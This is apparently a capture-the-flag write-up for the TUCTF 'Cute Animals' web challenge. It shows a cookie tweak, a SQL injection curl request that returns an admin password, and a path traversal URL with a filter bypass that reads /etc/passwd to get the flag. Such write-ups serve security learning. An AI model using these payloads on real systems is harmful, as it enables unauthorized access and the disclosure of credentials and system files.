Cute Animals
[web]
Cute animals
Recon
http://chal.tuctf.com:30000/loginform.html can be discovered by clicking in the menu on Admin login and ensuring your allowed cookie is set to:
echo -en "true" | base64
dHJ1ZQ==
Since by default it set to false.
Admin login
The admin login contains SQLi vulnerability. Fetching the admin password:
curl -s -v "http://chal.tuctf.com:30000/admin.php" -d "username=admin&password=' OR 1=1 LIMIT 0,1-- "
<link href="login.css" rel="stylesheet" type="text/css"><h4>Results</h4><p>user password</p><p>bro ultimate699</p>
Solution
Read /etc/passwd
http://chal.tuctf.com:30000/portal.php?file=.../.../..//.../.../..//.../.../..//.../.../..//.../.../..//etc/passwd&Submit=Submit`
TUCTF{m0r3_cut3_4n1m415_c4n_b3_f0und_4t_https://bit.ly/1HU2m5Q}